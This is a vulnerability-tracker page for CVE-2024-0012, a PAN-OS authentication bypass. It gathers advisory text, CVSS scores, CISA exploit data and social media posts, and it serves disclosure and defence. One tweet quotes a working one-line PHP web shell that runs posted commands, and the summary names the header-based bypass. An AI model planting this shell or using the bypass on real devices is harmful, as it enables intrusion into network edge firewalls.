CVE-2024-0012

Published Nov 18, 2024

Last updated 10 days ago

Exploit knownCVSS critical 9.3
Palo Alto Networks
PAN-OS

Overview

AI description

Automated description summarized from trusted sources.

CVE-2024-0012 is an authentication bypass vulnerability found in the Palo Alto Networks PAN-OS software. This flaw allows an unauthenticated attacker with network access to the management web interface to gain administrator privileges. This access enables the attacker to perform administrative actions, manipulate the device's configuration, or potentially exploit other vulnerabilities that require authentication, such as CVE-2024-9474. The vulnerability affects PAN-OS versions 10.2, 11.0, 11.1, and 11.2 running on PA-Series, VM-Series, CN-Series firewalls, and Panorama (both virtual and M-Series appliances). Cloud NGFW and Prisma Access are not affected. The vulnerability exists within the management interface application, which uses PHP. A specific HTTP request with a Palo Alto Networks-related authentication header set to "off" can bypass the typical authentication process. This manipulated request is sent to the Nginx reverse proxy server, which forwards it without processing, granting the attacker unauthorized access.

Description
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 . The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software. Cloud NGFW and Prisma Access are not impacted by this vulnerability.
Source
psirt@paloaltonetworks.com
NVD status
Modified
Products
pan-os

Insights

Analysis from the Intruder Security Team
Published Nov 19, 2024

The vulnerabilities CVE-2024-0012 and CVE-2024-9474 can be combined to allow for an unauthenticated attacker to gain command line access to the vulnerable device. Compromising a vulnerable device would allow an attacker to gain access to internal networks as these devices are designed to sit on the edge of networks.

The vulnerability is due to a misconfigured Nginx instance and a command injection vulnerability, both of which are exploitable in the devices default state. Watchtowr have released a technical blog post detailing the vulnerability and its exploitation.

Palo Alto have released patches and hotfixes for the PAN-OS vulnerabilities, details are available here and here.

Risk scores

CVSS 4.0

Type
Secondary
Base score
9.3
Impact score
-
Exploitability score
-
Vector string
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Red
Severity
CRITICAL

CVSS 3.1

Type
Primary
Base score
9.8
Impact score
5.9
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity
CRITICAL

Known exploits

Data from CISA

Vulnerability name
Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Exploit added on
Nov 18, 2024
Exploit action due
Dec 9, 2024
Required action
Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, management interface for affected devices should not be exposed to untrusted networks, including the internet.

Weaknesses

psirt@paloaltonetworks.com
CWE-306
nvd@nist.gov
CWE-306

Social media

Hype score
Not currently trending

  1. Actively exploited CVE : CVE-2024-0012

    @transilienceai

    28 Jun 2025

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  2. Actively exploited CVE : CVE-2024-0012

    @transilienceai

    8 Jun 2025

    28 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  3. Actively exploited CVE : CVE-2024-0012

    @transilienceai

    6 Jun 2025

    49 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  4. Actively exploited CVE : CVE-2024-0012

    @transilienceai

    5 Jun 2025

    50 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  5. Actively exploited CVE : CVE-2024-0012

    @transilienceai

    22 May 2025

    13 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  6. Actively exploited CVE : CVE-2024-0012

    @transilienceai

    22 May 2025

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  7. Palo Alto Networks 製 PAN-OS の脆弱性対策について(CVE-2024-0012等) https://t.co/eBYHxpsf1G

    @ICATalerts

    12 May 2025

    2598 Impressions

    2 Retweets

    2 Likes

    1 Bookmark

    0 Replies

    1 Quote

  8. Urgent: Thousands of Palo Alto Networks Firewalls Compromised by Zero-Day Vulnerabilities From Megan Peters at {sitename} 👉 Read full article: https://t.co/1zjoTBDDhV #CVE-2024-0012 #CVE-2024-9474 #Cybersecurity #FirewallSecurity #firewalls #hacked https://t.co/aDZpuf5kQP

    @newsarticlehub

    29 Mar 2025

    20 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  9. 🚨Just in: 2,000 Palo Alto firewalls compromised due to severe vulnerabilities (CVE-2024-0012 & CVE-2024-9474). If you haven't patched up yet, time to act! Don’t let hackers swim through your network – lock down your access now! 🔐 #CyberThreats #PatchItUp https://t.co/wWcE7N

    @WTE_Solutions

    24 Feb 2025

    22 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  10. Chinese hackers Emperor Dragonfly shift from espionage to ransomware, targeting an Asian IT company with RA World ransomware. Vulnerabilities exploited include CVE-2024-0012. 🦠💻 #China #Ransomware #CyberEspionage link: https://t.co/oxwrPnOiPu https://t.co/pHdue7MVr5

    @TweetThreatNews

    18 Feb 2025

    23 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    1 Reply

    0 Quotes

  11. Toshiba executable named "toshdpdb.exe" to sideload a malicious DLL named "toshdpapi.dll," has been seen exploiting Palo Alto Networks PAN-OS vulnerability (CVE-2024-0012). https://t.co/8tUI2dmCsO

    @GrimmAnalyst

    15 Feb 2025

    116 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  12. Palo AltoのPAN-OS機器の管理画面の認証回避 CVE-2025-0108のPoCをAssetnoteが公開し、Greynoiseが攻撃を観測。現状を調査するとグローバルで4416台の管理画面公開サーバを発見。同じ管理画面対象のCVE-2024-0012が話題になった昨年11月からは大きく減少するも、現在公開機器の約半数が脆弱なままです https://t.co/iKVkgCU8sD

    @nekono_naha

    14 Feb 2025

    1797 Impressions

    5 Retweets

    26 Likes

    7 Bookmarks

    0 Replies

    0 Quotes

  13. 🚨 New Cyber Threat Alert! 🚨 Hackers exploited a PAN-OS vulnerability (CVE-2024-0012) to deploy RA World ransomware, targeting an Asian software company. This attack blurs the line between state-sponsored espionage & financial cybercrime. 🔴 Key Takeaways: Nation-state… h

    @cybrhoodsentinl

    13 Feb 2025

    28 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  14. Aprovechan una vulnerabilidad crítica en el software de firewall PAN-OS de Palo Alto Networks (CVE-2024-0012) para implementar el ransomware RA World.  El ciberataque ocurrió a fines de 2024 y tuvo como objetivo una empresa mediana de software y servicios del sur de Asia. 🧉 ht

    @MarquisioX

    13 Feb 2025

    49 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  15. ⚠️ China-linked espionage group used PlugX malware and a Toshiba binary in a ransomware attack on a South Asian software company. Hackers claim to have exploited the CVE-2024-0012 vulnerability in Palo Alto Networks PAN-OS software. 👉 Read the full story to learn more:… https:

    @TheHackersNews

    13 Feb 2025

    12982 Impressions

    58 Retweets

    127 Likes

    19 Bookmarks

    1 Reply

    5 Quotes

  16. ⚠️ China-linked espionage group used PlugX malware and a Toshiba binary in a ransomware attack on a South Asian software company. The attack exploited the CVE-2024-0012 vulnerability in Palo Alto Networks software. 👉 Read the full story to learn more: https://t.co/9q9rGnYja5

    @TheHackersNews

    13 Feb 2025

    4945 Impressions

    4 Retweets

    12 Likes

    1 Bookmark

    1 Reply

    2 Quotes

  17. #exploit 1. CVE-2024-0012/CVE-2024-9474: Auth Bypass in PAN-OS Web Interface https://t.co/SgNOxX5gde 2. CVE-2025-23369: GitHub Entreprise Server SAML auth bypass https://t.co/iCGbLYz9rt 3. CVE-2022-45460: ROPing our way to RCE https://t.co/GzC2JZCb2N

    @ksg93rd

    11 Feb 2025

    90 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  18. 🔥 CVE-2024-0012 just landed in Metasploit! Ready to level up your #PurpleTeam game? 🛡️ Let's run an attack demo and dive into detection strategies to keep your defenses sharp. 💥 #CyberSecurity #ThreatHunting https://t.co/EOjhIdx55X

    @BriPwn

    9 Jan 2025

    94 Impressions

    0 Retweets

    4 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  19. CVE-2024-0012 (9.3) and CVE-2024-9474 (6.9) exploitation is in the wild. Post-explotaition Webshell example dropped. <?php $z="system"; if(${"_POST"}["b"]=="iUqPd") { $z(${"_POST"}["x"]); };

    @byt3n33dl3

    8 Jan 2025

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. 🔥 CVE-2024-0012 just landed in Metasploit! Do you think your Palo Alto firewall is super secure? Guess again! 🛡️ Let's run an attack demo and dive into detection strategies to keep your defenses sharp. 💥#CyberSecurity #ThreatHunting https://t.co/EOjhIdx55X

    @BriPwn

    8 Jan 2025

    108 Impressions

    0 Retweets

    8 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  21. ⚠️#ثغرات PAN-00-OS رقم CVE-2024-0012 و CVE-2024-9474! لا تزال هناك أجهزة #PaloAlto معرضة لتهديدات تصعيد الامتيازات والاستيلاء على النظام. تحقق من PoC لمهاجمة الأجهزة التي لم يتم إصلاحها وكيفية تحديد الإصدار المعرض للخطر باستخدام معلومات القائمة على #ASM! https://t.co/BVD5eerQhm h

    @CriminalIP_AR

    8 Jan 2025

    39 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  22. ⚠️PAN-OS #취약점 CVE-2024-0012 & CVE-2024-9474 주의! 여전히 권한 탈취와 시스템 장악 위협에 노출된 #팔로알토 장비들이 공개되어 있습니다. 패치되지않은 장비를 공격하는 PoC와 #ASM 기반 위협 인텔리전스로 취약한 버전을 확인하는 방법을 확인해보세요! https://t.co/oZDZfpoNfh https://t.co/z9jmhvAEYz https://t.co/A6yvp0hgod

    @CriminalIP_KR

    8 Jan 2025

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  23. ⚠️PAN-OS #脆弱性 CVE-2024-0012 & CVE-2024-9474にご注意! 権限奪取とシステム掌握の脅威にさらされている #パロアルト 機器がまだ公開されています。 パッチが適用されていない機器を攻撃するPoCと #ASM ベースの脅威インテリジェンスで脆弱なバージョンを確認する方法をご確認ください!… https://t.co/VeuIaiHB0u https://t.co/K8lNWWuvlW

    @CriminalIP_JP

    8 Jan 2025

    117 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  24. ''Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) by sfewer-r7 · Pull Request #19663 · rapid7/metasploit-framework'' #infosec #pentest #redteam #blueteam https://t.co/3FCdNJYFEh

    @CyberWarship

    3 Jan 2025

    3568 Impressions

    12 Retweets

    47 Likes

    17 Bookmarks

    3 Replies

    1 Quote

  25. Bishop Fox ASM gave teams a 24-hour advantage on the PAN-OS vulnerability (CVE-2024-0012) to safeguard systems before exploits could occur. Join our special town hall for insights and a live Q&A. Get your invite here: https://t.co/VkOu0O3rgc #PANOS #cybersecurity

    @behkfox

    27 Dec 2024

    15 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  26. Palo Alto merilis pembaruan untuk 2 kerentanan zero-day. CVE-2024-0012 memungkinkan "bypass autentikasi" dan CVE-2024-9474 terkait "eskalasi hak akses". Terungkap lebih dari 11.000 antarmuka manajemen PAN-OS terpapar, termasuk #Indonesia https://t.co/6hk4EV8Cnd https://t.co/KrtH

    @TweetThreatNews

    24 Dec 2024

    53 Impressions

    0 Retweets

    1 Like

    1 Bookmark

    0 Replies

    0 Quotes

  27. #threatreport #MediumCompleteness Wiz observes exploitation in the wild of PAN-OS vulnerabilities. What is CVE-2024-0012? | 21-12-2024 Source: https://t.co/AtO4mCKj8t Key details below ↓ 🧑‍💻Actors/Campaigns: Daggerfly 💀Threats: Sliver_c2_tool, Xmrig_miner,… https://t.co/5HT4

    @rst_cloud

    23 Dec 2024

    43 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  28. https://t.co/I0KbHzipmc Security breaches in Palo Alto Networks firewall devices On November 18, 2024, Palo Alto Networks announced two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A …

    @B2bCyber

    19 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  29. GitHub - TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC: This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script automates the exploitation process, including payload creation, chunked delivery https://t.co/qwxjv3ZKT4

    @testalways

    14 Dec 2024

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  30. 🚨We’ve just released a PoC and write-up on exploiting CVE-2024-0012 and CVE-2024-9474 in Palo Alto PAN-OS, demonstrating how these vulnerabilities can be chained for unauthenticated RCE 🔗 PoC Link: https://t.co/OLdPOO1Slt 📖 Write-up: https://t.co/oMHKDyDBEm

    @fahadshah4111

    13 Dec 2024

    64 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  31. 2024年11月分 #MBSD #SOC の検知傾向トピックスを公開しました。 今月は、Palo Alto Networks社のPAN-OSにおける認証回避・特権昇格の脆弱性(CVE-2024-0012, CVE-2024-9474)を狙った攻撃を新たに観測しました。 詳しくはこちら▼ https://t.co/G7Nl0Guxww #mbsd #脆弱性 #SOC… https://t.co/GtcYZyfJc8 https://t.co/egfuyt9Eit

    @mbsdnews

    13 Dec 2024

    589 Impressions

    1 Retweet

    3 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  32. ➡️ In November 2024, @PaloAltoNtwks disclosed two critical #vulnerabilities in PAN-OS, their Next-Generation Firewall operating system: CVE-2024-0012 and CVE-2024-9474. ➡️ Threat actors are actively chaining these vulnerabilities to achieve unauthenticated remote code execution

    @sygnia_labs

    11 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  33. Bishop Fox ASM gave teams a 24-hour head start on the PAN-OS vulnerability (CVE-2024-0012), securing systems before exploits emerged. Join our exclusive town hall for insights & live Q&A. Request your invite: https://t.co/vsB0ViwFld #cybersecurity #PANOS

    @bishopfox

    9 Dec 2024

    45 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  34. 🔒 Word of the Week: "Secure-by-Design" Secure-by-Design ensures security is built into every system, keeping you protected from threats like SocGholish malware, Lumma phishing campaigns, and actively exploited vulnerabilities like CVE-2024-0012. . 👉https://t.co/kiEDGymSSC http

    @GradientCyber

    9 Dec 2024

    46 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  35. What's wrong with you @PaloAltoNtwks ? Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474. https://t.co/R82Ng1GZmg https://t.co/yIRVpTByvX

    @l0rdmalware

    8 Dec 2024

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  36. Why Zero-Day Attacks Bypass Traditional Firewall Security: Defending Against Zero-Day’s like Palo Alto Networks CVE-2024-0012 - https://t.co/DNzqF9wTSR https://t.co/KlhsIjvA1Y

    @spinsafe

    6 Dec 2024

    36 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  37. A critical vulnerability (CVE-2024-0012) in PAN-OS firewalls threatens secure access and enables unauthorized system exploitation. 🔗https://t.co/6GYce8vSCY #itsecurity #cybersecurity

    @TrueFort

    5 Dec 2024

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  38. 🔐 #Firewalls are vital, but #ZeroDay exploits like Palo Alto CVE-2024-0012 expose their limits. MixMode's #AI detected threats weeks early, giving customers a critical edge. Stay ahead of evolving threats! 👉 Read more: https://t.co/qCq4ErtoXR https://t.co/EIoNJzhErO

    @MixModeAI

    5 Dec 2024

    16 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  39. [NEW VIDEO] @packetdefender explains how users can quickly find critical vulnerabilities like #paloaltonetworks CVE-2024-0012 and CVE-2024-9474; while also addressing #CISA BOD 23-02: Implementation Guidance for Mitigating the Risk from Internet-Exposed Management Interfaces http

    @forwardnetworks

    4 Dec 2024

    35 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  40. #threatreport #LowCompleteness Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22) | 02-12-2024 Source: https://t.co/Ufx2z1M2IZ Key details below ↓ 🧑‍💻Actors/Campaigns: Lunar_peek 🎯Victims: Palo alto networks 🌐Geo: Emea

    @rst_cloud

    3 Dec 2024

    107 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  41. Over 2,000 Palo Alto Networks devices compromised in a recent attack, exploiting CVE-2024-0012 & CVE-2024-9474. Stay vigilant and enhance security! Read more: https://t.co/qvngYfWNr0 #PaloAlto #CyberThreats #DataBreach https://t.co/Y4kwYLkeix

    @CyberPro_M

    2 Dec 2024

    73 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  42. Palo Alto PAN-OS の脆弱性 CVE-2024-0012/9474:2,000 台以上のデバイスが危機に直面 https://t.co/lTqsIJY1n2 #CyberAttack #Exploit #Firewall #Government #PaloAlto #PoCExploit #Shadowserver #Vulnerability #ZeroDay

    @iototsecnews

    2 Dec 2024

    207 Impressions

    1 Retweet

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  43. 3/11 Exploited vulnerabilities: CVE-2024-0012 (Auth bypass) and CVE-2024-9474 (Priv. escalation). A dangerous combo for attackers. #FirewallVulnerabilities 🔐

    @Eth1calHackrZ

    2 Dec 2024

    76 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  44. 🚨 2,000+ Palo Alto firewalls compromised! 😱 CVE-2024-0012 lets attackers bypass auth, while CVE-2024-9474 escalates privileges. 📈 Time to tighten up access & patch your systems! 🛡️ #CyberSecurity #Infosec #NetworkSecurity https://t.co/7SEmEXHis9 https://t.co/UEpUJzoTiT

    @WTE_Solutions

    1 Dec 2024

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  45. Palo Alto Networks 製 PAN-OS の脆弱性対策について(CVE-2024-0012等) https://t.co/9tCuM7I6LR

    @testshinotsuka

    1 Dec 2024

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  46. Top 5 Trending CVEs: 1 - CVE-2024-0012 2 - CVE-2023-28205 3 - CVE-2024-52443 4 - CVE-2024-49019 5 - CVE-2024-11477 #cve #cvetrends #cveshield #cybersecurity https://t.co/4Fua3CAN6W

    @CVEShield

    1 Dec 2024

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  47. The Shadowserver Foundation reports that over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012 & CVE-2024-9474, enabling admin bypass and root access. Top targets: US & India. https://t.co/MEkAMzSr7y

    @darkwebinsight

    1 Dec 2024

    37 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    1 Quote

  48. CVE-2024-0012/CVE-2024-9474 : Found in Palo Alto Networks PAN-OS. Weak validation in Nginx configs & inputs allows for auth bypass, leading to admin privilege escalation. https://t.co/tAyhI4npuV

    @hackyboiz

    30 Nov 2024

    2707 Impressions

    18 Retweets

    47 Likes

    14 Bookmarks

    0 Replies

    0 Quotes

  49. Palo Alto Networks 製 PAN-OS の脆弱性対策について(CVE-2024-0012等) https://t.co/9tCuM7I6LR

    @testshinotsuka

    30 Nov 2024

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  50. Elevation of Privilege - PAN-OS (CVE-2024-9474). The need for authentication and admin access could limit this vulnerability's impact, but here we have the previous vulnerability Authentication Bypass - PAN-OS (CVE-2024-0012). 😏 #PaloAlto ➡️ https://t.co/17vlgiQy75 https://t.co

    @leonov_av

    29 Nov 2024

    69 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations

References

Sources include official advisories and independent security research.